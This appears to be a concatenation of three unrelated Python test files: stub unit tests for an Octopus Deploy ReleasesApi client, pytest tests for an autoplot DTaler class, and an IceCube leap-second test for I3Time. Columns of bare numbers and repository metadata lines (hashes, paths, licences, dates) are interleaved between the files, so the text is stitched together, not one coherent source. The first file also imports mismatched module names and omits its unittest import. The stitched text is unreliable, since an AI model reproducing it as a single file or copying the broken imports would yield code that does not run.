import octopus_deploy_swagger_client
from octopus_deploy_client.releases_api import ReleasesApi # noqa: E501
from octopus_deploy_swagger_client.rest import ApiException
class TestReleasesApi(unittest.TestCase):
"""ReleasesApi unit test stubs"""
def setUp(self):
self.api = octopus_deploy_client.releases_api.ReleasesApi() # noqa: E501
def tearDown(self):
pass
def test_child_index_response_descriptor_projects_project_projects_release_project_resource_release_resource(self):
"""Test case for child_index_response_descriptor_projects_project_projects_release_project_resource_release_resource
Get a list of ReleaseResources # noqa: E501
"""
pass
def test_child_index_response_descriptor_projects_project_projects_release_project_resource_release_resource_spaces(self):
"""Test case for child_index_response_descriptor_projects_project_projects_release_project_resource_release_resource_spaces
Get a list of ReleaseResources # noqa: E501
"""
pass
def test_child_index_response_descriptor_projects_release_projects_deployment_release_resource_deployment_resource(self):
"""Test case for child_index_response_descriptor_projects_release_projects_deployment_release_resource_deployment_resource
Get a list of DeploymentResources # noqa: E501
"""
pass
def test_child_index_response_descriptor_projects_release_projects_deployment_release_resource_deployment_resource_spaces(self):
"""Test case for child_index_response_descriptor_projects_release_projects_deployment_release_resource_deployment_resource_spaces
Get a list of DeploymentResources # noqa: E501
"""
pass
def test_create_response_descriptor_projects_release_release_resource(self):
"""Test case for create_response_descriptor_projects_release_release_resource
Create a ReleaseResource # noqa: E501
"""
pass
def test_create_response_descriptor_projects_release_release_resource_spaces(self):
"""Test case for create_response_descriptor_projects_release_release_resource_spaces
Create a ReleaseResource # noqa: E501
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_defect_reported_responder(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_defect_reported_responder
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_defect_reported_responder_spaces(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_defect_reported_responder_spaces
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_defect_resolved_responder(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_defect_resolved_responder
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_defect_resolved_responder_spaces(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_defect_resolved_responder_spaces
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action_0(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action_0
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action_spaces(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action_spaces
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action_spaces_0(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_deployment_preview_action_spaces_0
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_deployment_template_action(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_deployment_template_action
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_deployment_template_action_spaces(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_deployment_template_action_spaces
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_release_by_project_and_version_responder(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_release_by_project_and_version_responder
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_release_by_project_and_version_responder_spaces(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_release_by_project_and_version_responder_spaces
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_release_lifecycle_progression_action(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_release_lifecycle_progression_action
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_release_lifecycle_progression_action_spaces(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_release_lifecycle_progression_action_spaces
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_release_snapshot_variables_action(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_release_snapshot_variables_action
"""
pass
def test_custom_action_response_descriptor_octopus_server_web_api_actions_release_snapshot_variables_action_spaces(self):
"""Test case for custom_action_response_descriptor_octopus_server_web_api_actions_release_snapshot_variables_action_spaces
"""
pass
def test_custom_query_response_descriptor_octopus_server_web_api_actions_list_defects_responder(self):
"""Test case for custom_query_response_descriptor_octopus_server_web_api_actions_list_defects_responder
"""
pass
def test_custom_query_response_descriptor_octopus_server_web_api_actions_list_defects_responder_spaces(self):
"""Test case for custom_query_response_descriptor_octopus_server_web_api_actions_list_defects_responder_spaces
"""
pass
def test_delete_on_background_response_descriptor_projects_release_release_resource(self):
"""Test case for delete_on_background_response_descriptor_projects_release_release_resource
Delete a ReleaseResource by ID # noqa: E501
"""
pass
def test_delete_on_background_response_descriptor_projects_release_release_resource_spaces(self):
"""Test case for delete_on_background_response_descriptor_projects_release_release_resource_spaces
Delete a ReleaseResource by ID # noqa: E501
"""
pass
def test_index_response_descriptor_projects_release_release_resource(self):
"""Test case for index_response_descriptor_projects_release_release_resource
Get a list of ReleaseResources # noqa: E501
"""
pass
def test_index_response_descriptor_projects_release_release_resource_spaces(self):
"""Test case for index_response_descriptor_projects_release_release_resource_spaces
Get a list of ReleaseResources # noqa: E501
"""
pass
def test_load_response_descriptor_projects_release_release_resource(self):
"""Test case for load_response_descriptor_projects_release_release_resource
Get a ReleaseResource by ID # noqa: E501
"""
pass
def test_load_response_descriptor_projects_release_release_resource_spaces(self):
"""Test case for load_response_descriptor_projects_release_release_resource_spaces
Get a ReleaseResource by ID # noqa: E501
"""
pass
def test_modify_response_descriptor_projects_release_release_resource(self):
"""Test case for modify_response_descriptor_projects_release_release_resource
Modify a ReleaseResource by ID # noqa: E501
"""
pass
def test_modify_response_descriptor_projects_release_release_resource_spaces(self):
"""Test case for modify_response_descriptor_projects_release_release_resource_spaces
Modify a ReleaseResource by ID # noqa: E501
"""
pass
if __name__ == '__main__':
unittest.main()
| 39.838174
| 137
| 0.793876
| 1,155
| 9,601
| 5.971429
| 0.084848
| 0.167029
| 0.130492
| 0.161809
| 0.931999
| 0.9233
| 0.9233
| 0.912281
| 0.896622
| 0.895752
| 0
| 0.011728
| 0.165191
| 9,601
| 240
| 138
| 40.004167
| 0.848784
| 0.467035
| 0
| 0.434211
| 1
| 0
| 0.001708
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.447368
| false
| 0.434211
| 0.065789
| 0
| 0.526316
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 1
| 0
|
0
| 11
|
86865a280a4b911c6f25567b181b77327711f1d1
| 12,744
|
py
|
Python
|
ipython-extension/tests/unit/autoplot/test_dtaler.py
|
kernelpanek/jupyterlab-autoplot
|
023b0b6a1ebc1857b4dab95c04286d45ec70fc42
|
[
"BSD-3-Clause"
] | 48
|
2021-01-27T14:40:00.000Z
|
2022-03-31T10:15:35.000Z
|
ipython-extension/tests/unit/autoplot/test_dtaler.py
|
kernelpanek/jupyterlab-autoplot
|
023b0b6a1ebc1857b4dab95c04286d45ec70fc42
|
[
"BSD-3-Clause"
] | 1
|
2021-03-11T06:31:35.000Z
|
2021-07-29T18:47:29.000Z
|
ipython-extension/tests/unit/autoplot/test_dtaler.py
|
kernelpanek/jupyterlab-autoplot
|
023b0b6a1ebc1857b4dab95c04286d45ec70fc42
|
[
"BSD-3-Clause"
] | 5
|
2021-04-22T17:44:12.000Z
|
2022-02-09T22:47:16.000Z
|
from typing import Union
from unittest.mock import patch
import dtale.global_state
import pandas as pd
import pytest
from IPython.core.display import Image
from autoplot.dtaler import DTaler, VarData
from autoplot.extensions.autoplot_display import AutoplotDisplay
from autoplot.extensions.toast import Toast
from ipywidgets import Output
@patch("autoplot.dtaler.display")
def test_force_draw_no_variable_update(display_mock, dtaler):
dtaler.draw(True, AutoplotDisplay())
assert isinstance(_get_parameter(display_mock), Image)
@patch("autoplot.dtaler.display")
def test_force_draw_with_variable_update(display_mock, dtaler):
dtaler.update_variables({})
dtaler.draw(True, AutoplotDisplay())
assert isinstance(_get_parameter(display_mock), Image)
@patch("autoplot.dtaler.display")
def test_force_draw_with_variable_update_and_unexpected_data_id(display_mock, dtaler):
dtaler.update_variables({})
output = AutoplotDisplay()
output.data_id = "1"
dtaler.draw(True, output)
assert isinstance(_get_parameter(display_mock), Image)
@patch("autoplot.dtaler.display")
def test_draw_dataframe(display_mock, dtaler):
df = pd.DataFrame({"a": [1, 2, 3]})
dtaler.update_variables({"df": df})
dtaler.draw(False, AutoplotDisplay())
assert all(_get_parameter(display_mock).data == df)
@patch("autoplot.dtaler.display")
def test_draw_new_dataframe(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"b": [1, 2, 3]})
output = AutoplotDisplay()
vars = {"df1": df1}
dtaler.update_variables(vars)
vars["df2"] = df2
dtaler.update_variables(vars)
output.data_id = dtaler._tracked["df1"].dd._data_id
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df2)
assert len(dtaler._tracked) == 2
@patch("autoplot.dtaler.display")
def test_draw_reassigned_dataframe(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
vars = {"df1": df1, "df2": df2}
dtaler.update_variables(vars)
new_df1 = pd.DataFrame({"a": [7, 8, 9]})
vars["df1"] = new_df1
dtaler.update_variables(vars)
output.data_id = dtaler._tracked["df1"].dd._data_id
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df1)
assert len(dtaler._tracked) == 2
assert dtaler._tracked["df1"].pdf is new_df1
@patch("autoplot.dtaler.display")
def test_draw_does_not_reload_hidden_df(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
vars = {"df1": df1, "df2": df2}
dtaler.update_variables(vars)
vars["df1"] = pd.DataFrame({"a": [1, 2, 3]})
dtaler.update_variables(vars)
output.data_id = dtaler._tracked["df2"].dd._data_id
dtaler.draw(False, output)
assert not display_mock.called
assert len(dtaler._tracked) == 2
@patch("autoplot.dtaler.display")
def test_draw_external_data_id_does_not_reload(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
df3 = pd.DataFrame({"a": [7, 8, 9]})
output = AutoplotDisplay()
vars = {"df1": df1, "df2": df2}
dtaler.update_variables(vars)
vars["df1"] = pd.DataFrame({"a": [1, 2, 3]})
output.data_id = dtale.show(df3, ignore_duplicate=True)._data_id
dtaler.update_variables(vars)
dtaler.draw(False, output)
assert not display_mock.called
def test_do_not_reinsert_externally_removed_frames_when_variable_is_updated(dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"b": [1, 2, 3]})
vars = {"df1": df1, "df2": df2}
dtaler.update_variables(vars)
dtale.global_state.cleanup(dtaler._tracked["df1"].dd._data_id)
vars["df1"] = pd.DataFrame({"a": [4, 5, 6]})
dtaler.update_variables(vars)
assert len(dtaler._tracked) == 1
assert dtaler._ignored == {"df1"}
assert "df1" not in dtaler._tracked
def test_do_not_reinsert_externally_removed_frames_when_variable_is_the_same(dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"b": [1, 2, 3]})
vars = {"df1": df1, "df2": df2}
dtaler.update_variables(vars)
old_dd = dtaler._tracked["df1"].dd
dtale.global_state.cleanup(old_dd._data_id)
dtaler.update_variables(vars)
assert len(dtaler._tracked) == 1
assert dtaler._ignored == {"df1"}
assert "df1" not in dtaler._tracked
@patch("autoplot.dtaler.display")
def test_draw_doesnt_reload_hidden_dfs(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
vars = {"df1": df1, "df2": df2}
dtaler.update_variables(vars)
output.data_id = dtaler._tracked["df1"].dd._data_id
vars.pop("df2")
dtaler.update_variables(vars)
dtaler.draw(False, output)
assert not display_mock.called
assert len(dtaler._tracked) == 1
@patch("autoplot.dtaler.display")
def test_draw_reloads_when_visible_df_deleted(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"b": [1, 2, 3]})
output = AutoplotDisplay()
vars = {"df1": df1, "df2": df2}
dtaler.update_variables(vars)
output.data_id = dtaler._tracked["df2"].dd._data_id
vars.pop("df2")
dtaler.update_variables(vars)
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df1)
assert len(dtaler._tracked) == 1
@patch("autoplot.dtaler.display")
def test_ignore_new_variables_when_frozen(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
output = AutoplotDisplay()
dtaler.freeze(Toast(Output()))
dtaler.update_variables({"df1": df1})
dtaler.draw(True, output)
assert isinstance(_get_parameter(display_mock), Image)
assert "df1" not in dtaler._tracked
assert "df1" in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_update_non_ignored_variables(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1})
dtaler.freeze(Toast(Output()))
new_df1 = pd.DataFrame({"b": [4, 5, 6]})
dtaler.update_variables({"df1": new_df1})
dtaler.draw(True, output)
assert all(_get_parameter(display_mock).data == new_df1)
assert dtaler._tracked["df1"].pdf is new_df1
assert "df1" not in dtaler._ignored
def test_update_ignored_variables_still_ignored(dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
dtaler.freeze(Toast(Output()))
dtaler.update_variables({"df1": df1})
new_df1 = pd.DataFrame({"b": [4, 5, 6]})
dtaler.update_variables({"df1": new_df1})
assert "df1" not in dtaler._tracked
assert "df1" in dtaler._ignored
def test_remove_ignored_variables(dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
dtaler.freeze(Toast(Output()))
dtaler.update_variables({"df1": df1})
dtaler.update_variables({})
assert len(dtaler._tracked) == 0
assert len(dtaler._ignored) == 0
@patch("autoplot.dtaler.display")
def test_continue_to_ignore_after_defrost(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
output = AutoplotDisplay()
dtaler.freeze(Toast(Output()))
dtaler.update_variables({"df1": df1})
dtaler.defrost(Toast(Output()))
dtaler.update_variables({"df1": df1})
dtaler.draw(True, output)
assert isinstance(_get_parameter(display_mock), Image)
assert "df1" not in dtaler._tracked
assert "df1" in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_accept_new_variables_after_defrost(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"b": [4, 5, 6]})
output = AutoplotDisplay()
dtaler.freeze(Toast(Output()))
dtaler.update_variables({"df1": df1})
dtaler.defrost(Toast(Output()))
dtaler.update_variables({"df1": df1, "df2": df2})
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df2)
assert "df1" not in dtaler._tracked
assert "df2" in dtaler._tracked
assert "df1" in dtaler._ignored
assert "df2" not in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_ignore_current_variable_no_fallback(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1})
output.data_id = dtaler._tracked["df1"].dd._data_id
dtaler.ignore_variable(Toast(Output()), "df1")
dtaler.update_variables({"df1": df1})
dtaler.draw(False, output)
assert isinstance(_get_parameter(display_mock), Image)
assert "df1" not in dtaler._tracked
assert "df1" in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_ignore_current_variable_with_fallback(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1, "df2": df2})
output.data_id = dtaler._tracked["df1"].dd._data_id
dtaler.ignore_variable(Toast(Output()), "df1")
dtaler.update_variables({"df1": df1, "df2": df2})
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df2)
assert "df1" not in dtaler._tracked
assert "df1" in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_ignore_other_variable_with_fallback(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1, "df2": df2})
output.data_id = dtaler._tracked["df1"].dd._data_id
dtaler.ignore_variable(Toast(Output()), "df2")
dtaler.update_variables({"df1": df1, "df2": df2})
dtaler.draw(False, output)
assert not display_mock.called
assert "df2" not in dtaler._tracked
assert "df2" in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_show_ignored_variable(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1, "df2": df2})
output.data_id = dtaler._tracked["df1"].dd._data_id
dtaler.ignore_variable(Toast(Output()), "df2")
dtaler.update_variables({"df1": df1, "df2": df2})
dtaler.show_variable(Toast(Output()), "df2")
dtaler.update_variables({"df1": df1, "df2": df2})
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df2)
assert "df2" in dtaler._tracked
assert "df2" not in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_show_variable(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1, "df2": df2})
output.data_id = dtaler._tracked["df2"].dd._data_id
dtaler.show_variable(Toast(Output()), "df1")
dtaler.update_variables({"df1": df1, "df2": df2})
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df1)
assert "df2" in dtaler._tracked
assert "df2" not in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_show_frozen_variable(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1})
output.data_id = dtaler._tracked["df1"].dd._data_id
dtaler.freeze(Toast(Output()))
dtaler.update_variables({"df1": df1, "df2": df2})
assert "df2" not in dtaler._tracked
assert "df2" in dtaler._ignored
dtaler.show_variable(Toast(Output()), "df2")
dtaler.update_variables({"df1": df1, "df2": df2})
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df2)
assert "df2" in dtaler._tracked
assert "df2" not in dtaler._ignored
@patch("autoplot.dtaler.display")
def test_delete_from_dtale_and_namespace(display_mock, dtaler):
df1 = pd.DataFrame({"a": [1, 2, 3]})
df2 = pd.DataFrame({"a": [4, 5, 6]})
output = AutoplotDisplay()
dtaler.update_variables({"df1": df1, "df2": df2})
output.data_id = dtaler._tracked["df1"].dd._data_id
dtale.global_state.cleanup(dtaler._tracked["df1"].dd._data_id)
dtaler.update_variables({"df2": df2})
dtaler.draw(False, output)
assert all(_get_parameter(display_mock).data == df2)
assert "df1" not in dtaler._tracked
assert "df1" not in dtaler._ignored
def _get_parameter(display_mock) -> Union[Image, VarData]:
return display_mock.call_args[0][0]
@pytest.fixture
def dtaler():
dtaler = DTaler()
yield dtaler
dtale.global_state.cleanup()
| 29.364055
| 86
| 0.680006
| 1,741
| 12,744
| 4.758185
| 0.068352
| 0.066634
| 0.11661
| 0.045268
| 0.876268
| 0.867697
| 0.839087
| 0.811082
| 0.78718
| 0.776799
| 0
| 0.034632
| 0.16392
| 12,744
| 433
| 87
| 29.431871
| 0.742844
| 0
| 0
| 0.79402
| 0
| 0
| 0.068895
| 0.0379
| 0
| 0
| 0
| 0
| 0.209302
| 1
| 0.089701
| false
| 0
| 0.033223
| 0.003322
| 0.126246
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
86de781a47d47377f404e4a1212d476179f38a6b
| 20,540
|
py
|
Python
|
dataclasses/resources/test/leap_second_test.py
|
hschwane/offline_production
|
e14a6493782f613b8bbe64217559765d5213dc1e
|
[
"MIT"
] | 1
|
2020-12-24T22:00:01.000Z
|
2020-12-24T22:00:01.000Z
|
dataclasses/resources/test/leap_second_test.py
|
hschwane/offline_production
|
e14a6493782f613b8bbe64217559765d5213dc1e
|
[
"MIT"
] | null | null | null |
dataclasses/resources/test/leap_second_test.py
|
hschwane/offline_production
|
e14a6493782f613b8bbe64217559765d5213dc1e
|
[
"MIT"
] | 3
|
2020-07-17T09:20:29.000Z
|
2021-03-30T16:44:18.000Z
|
#!/usr/bin/env python
"""
Leap Second Unit Test Suite
This file tests I3Time for leap second awareneness.
It uses a file of days with leap seconds from the Navy and tests to
make sure I3Time works well with leap seconds.
It depends on http://maia.usno.navy.mil/ser7/tai-utc.dat, which is
kept in ${I3_TESTDATA}. The USNO updates this file every six
months, hence the age test.
"""
import os,datetime,random
from icecube import dataclasses
from icecube.icetray import I3Units
random.seed(42) # Make repeatable
def approx_Equal(x, y, tolerance=0.001):
return abs(x-y) <= 0.5 * tolerance * (x + y)
now = datetime.datetime.now()
filename = os.path.join(os.getenv("I3_TESTDATA"),'dataclasses','tai-utc.dat')
#store Modified julian date of days with leap seconds here
leap_sec_mjd = []
#The first 13 lines of this file contian an older way to do leapseconds which arn't supported
for line in open(filename).readlines()[13:]:
#column 17-23 contian the julian date of the day after a leap second
#subract 2400000 to obtian the modified julian date
leap_sec_mjd.append(int(line[17:24])-2400000)
#first make sure first leap second is JAN 1, 1972
assert(leap_sec_mjd[0]==41317)
#test every day from 1970 to
for mjd in range(40587,max(dataclasses.make_I3Time(now).mod_julian_day,leap_sec_mjd[-1])+3*365):
if mjd+1 in leap_sec_mjd:
if not dataclasses.leap_second_on_mjd(mjd):
err_str = "MJD "+str(mjd)+" not in I3Time list of leap seconds, "\
"possibly a leap second was added and I3Time.cxx needs to be updated"
raise Exception(err_str)
elif dataclasses.leap_second_on_mjd(mjd):
err_str = str(mjd)+" incorrectly registers as a leap seconds"
raise Exception(err_str)
#instantiate I3Time for leapsecond testing
t1=dataclasses.I3Time()
t2=dataclasses.I3Time()
#check every year from 1970 to 3 years in the future
for year in range (1970,max(dataclasses.year_of(leap_sec_mjd[-1]),now.year)+3):
#twleve hours before tranition to July
t1.set_utc_cal_date(year,6,30,12, 0, 0,0)
#twleve hours after tranition to July
t2.set_utc_cal_date(year,7, 1,12, 0, 0,0)
#true if this june-july transition has leap second
leap_sec = t2.mod_julian_day in leap_sec_mjd
#test I3Time-I3Time
#difference between t1 and t2 should be 86400 seconds +/- one leap second
assert (t1-t2)/I3Units.second+86400 == -leap_sec
assert (t2-t1)/I3Units.second-86400 == leap_sec
#test I3Time+double and I3Time-double
if leap_sec:
#if leap second is present adding one day and one second should get
#you noon the next day
assert(t1+86401*I3Units.second==t2)
assert(t2-86401*I3Units.second==t1)
else:
#with no leap second present adding exactly one day should get
#you noon the next day
assert(t1+86400*I3Units.second==t2)
assert(t2-86400*I3Units.second==t1)
#re-initilize t1, t2, and t3
t1=dataclasses.I3Time()
t2=dataclasses.I3Time()
t3=dataclasses.I3Time()
if leap_sec:
#set to leap second itsself
nanosec = random.randint(0,1e9)
t1.set_utc_cal_date(year,6,30,23,59,59,nanosec)
t2.set_utc_cal_date(year,6,30,23,59,60,nanosec)
t3.set_utc_cal_date(year,7, 1, 0, 0, 0,nanosec)
assert not t1.is_leap_second
assert t2.is_leap_second
assert not t3.is_leap_second
# Python's date time doesn't handle leap seconds,
# so it sets the time to 23:59:59.999999
dt1=t1.date_time
dt2=t2.date_time
dt3=t3.date_time
assert dt1 == datetime.datetime(year,6,30,23,59,59,int(nanosec/1000.))
assert dt1+datetime.timedelta(0, 1) == datetime.datetime(year,7, 1, 0, 0, 0,int(nanosec/1000.))
assert dt2 == datetime.datetime(year,6,30,23,59,59,999999)
assert dt3 == datetime.datetime(year,7, 1, 0, 0, 0,int(nanosec/1000.))
assert dt3+datetime.timedelta(0,-1) == datetime.datetime(year,6,30,23,59,59,int(nanosec/1000.))
#although the invalid python leap second object return true when compared to eachother
assert (t1+1*I3Units.second).date_time == dt2
assert (t1+2*I3Units.second).date_time == dt3
assert (t2+1*I3Units.second).date_time == dt3
assert (t2-1*I3Units.second).date_time == dt1
assert (t3-1*I3Units.second).date_time == dt2
assert (t3-2*I3Units.second).date_time == dt1
#mjd = t1.mod_julian_day
assert t1.mod_julian_day == t2.mod_julian_day
assert t1.mod_julian_day +1 == t3.mod_julian_day
assert t1.mod_julian_day not in leap_sec_mjd
assert t3.mod_julian_day in leap_sec_mjd
assert int(t1.mod_julian_day_double) == t1.mod_julian_day
assert int(t2.mod_julian_day_double) == t2.mod_julian_day
assert int(t3.mod_julian_day_double) == t3.mod_julian_day
assert approx_Equal(t1.mod_julian_day_double , t2.mod_julian_day_double,1e-10)
assert approx_Equal(t1.mod_julian_day_double + 1/86400., t3.mod_julian_day_double,1e-10)
assert t1.mod_julian_nano_sec == nanosec
assert t2.mod_julian_nano_sec == nanosec
assert t3.mod_julian_nano_sec == nanosec
assert t1.mod_julian_sec == 86399
assert t2.mod_julian_sec == 86400
assert t3.mod_julian_sec == 0
assert t2.unix_time + 1 == t3.unix_time
assert t1.unix_time + 1 == t3.unix_time
assert t1.unix_time == (t3.mod_julian_day-40587)*86400 -1
assert t2.unix_time == (t3.mod_julian_day-40587)*86400 -1
assert t3.unix_time == (t3.mod_julian_day-40587)*86400
assert t3.utc_daq_time - t2.utc_daq_time == 1e10
assert t2.utc_daq_time - t1.utc_daq_time == 1e10
assert t3.utc_daq_time - t1.utc_daq_time == 2e10
assert t1.utc_daq_time == ( 181 + int(year%4==0) )*int(8.64e14) + nanosec*10 - int(1e10)
assert t2.utc_daq_time == ( 181 + int(year%4==0) )*int(8.64e14) + nanosec*10
assert t3.utc_daq_time == ( 181 + int(year%4==0) )*int(8.64e14) + nanosec*10 + int(1e10)
assert t1.utc_day_of_month == 30
assert t2.utc_day_of_month == 30
assert t3.utc_day_of_month == 1
assert t1.utc_month == dataclasses.I3Time.Jun
assert t2.utc_month == dataclasses.I3Time.Jun
assert t3.utc_month == dataclasses.I3Time.Jul
assert t1.utc_nano_sec == nanosec
assert t2.utc_nano_sec == nanosec
assert t3.utc_nano_sec == nanosec
#July 1 is the 181th day of the year on standard years and 182th on leap years
assert t1.utc_sec == (181+ int(year%4==0))*86400 - 1
assert t2.utc_sec == (181+ int(year%4==0))*86400
assert t3.utc_sec == (181+ int(year%4==0))*86400 + 1
assert t1.utc_year==year
assert t2.utc_year==year
assert t3.utc_year==year
#test that it prints out the leap second correctly
assert t1.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-06-30 23:59:59"%t1.utc_year
assert t2.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-06-30 23:59:60"%t1.utc_year
assert t3.get_utc_string("%Y-%m-%d %H:%M:%S")=="%4d-07-01 00:00:00"%t1.utc_year
#test arithmatic
assert(t1+ I3Units.second==t2)
assert(t2+ I3Units.second==t3)
assert(t1+2*I3Units.second==t3)
assert(t3- I3Units.second==t2)
assert(t2- I3Units.second==t1)
assert(t3-2*I3Units.second==t1)
assert(t2-t1== I3Units.second)
assert(t3-t2== I3Units.second)
assert(t3-t1==2*I3Units.second)
assert(t1-t2== -I3Units.second)
assert(t2-t3== -I3Units.second)
assert(t1-t3==-2*I3Units.second)
else:
nanosec = random.randint(0,1e9)
t1.set_utc_cal_date(year,6,30,23,59,59,nanosec)
t2.set_utc_cal_date(year,6,30,23,59,60,nanosec)
t3.set_utc_cal_date(year,7, 1, 0, 0, 0,nanosec)
assert t2 == dataclasses.I3Time()
assert not t1.is_leap_second
assert not t3.is_leap_second
dt1=t1.date_time
dt3=t3.date_time
assert dt1 == datetime.datetime(year,6,30,23,59,59,int(nanosec/1000.))
assert dt1+datetime.timedelta(0, 1) == datetime.datetime(year,7, 1, 0, 0, 0,int(nanosec/1000.))
assert dt3 == datetime.datetime(year,7, 1, 0, 0, 0,int(nanosec/1000.))
assert dt3+datetime.timedelta(0,-1) == datetime.datetime(year,6,30,23,59,59,int(nanosec/1000.))
#although the invalid python leap second object return true when compared to eachother
assert (t1+1*I3Units.second).date_time == dt3
assert (t3-1*I3Units.second).date_time == dt1
#mjd = t1.mod_julian_day
assert t1.mod_julian_day +1 == t3.mod_julian_day
assert t1.mod_julian_day not in leap_sec_mjd
assert t3.mod_julian_day not in leap_sec_mjd
assert int(t1.mod_julian_day_double) == t1.mod_julian_day
assert int(t3.mod_julian_day_double) == t3.mod_julian_day
assert approx_Equal(t1. mod_julian_day_double + 1/86400. , t3.mod_julian_day_double,1e-10)
assert t1.mod_julian_nano_sec == nanosec
assert t3.mod_julian_nano_sec == nanosec
assert t1.mod_julian_sec == 86399
assert t3.mod_julian_sec == 0
#as per ntp unix time of leap seconds is the next seconds's unix time
assert t1.unix_time + 1 == t3.unix_time
assert t1.unix_time == (t3.mod_julian_day-40587)*86400 -1
